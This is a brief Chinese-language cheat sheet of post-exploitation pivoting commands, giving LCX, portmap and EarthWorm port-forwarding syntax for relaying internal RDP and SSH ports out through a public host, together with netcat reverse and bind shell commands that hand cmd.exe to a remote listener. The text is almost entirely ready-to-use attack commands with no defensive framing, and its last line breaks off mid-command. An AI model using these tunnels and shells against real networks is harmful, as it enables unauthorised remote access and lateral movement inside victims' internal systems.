LCX端口转发
正向转发
内网主机执行:lcx.exe –slave 公网主机IP 公网主机端口 内网主机IP 内网主机端口
外网主机执行:Lcx.exe –listen 公网主机端口1 公网主机端口2
反向转发
外网主机执行:Lcx.exe -tran 53 目标主机IP 3389
PORTMAP端口转发
正向转发
内网主机执行:./portmap -m 3 -h1 127.0.0.1 -p1 22 -h2 公网主机ip -p2 6666
外网主机执行:./portmap -m 2 -p1 6666 -h2 公网主机ip -p2 7777
反向转发
外网主机执行:./portmap -m1 -p1 6666 -h2 目标主机IP -p2 22
NC反弹
反向连接
在公网主机进行监听:nc -lvp 4444
在内网主机执行:nc -t -e cmd.exe 公网主机IP 4444
正向连接
远程主机执行:nc -l -p 4444 -t -e cmd.exe
攻击主机执行:nc -vv 远程主机IP 4444
EW工具使用
端口转发
反向转发
./ew_for_Linux64 -s lcx_tran -l 1080 -f 内网主机IP -g 3389
正向转发
公网执行:ew -s lcx_listen -l 1080 -e 8080
内网执行:ew -s lcx_slave -d 192.168.0.31 -e 8080 -f 192.168.5.101 -g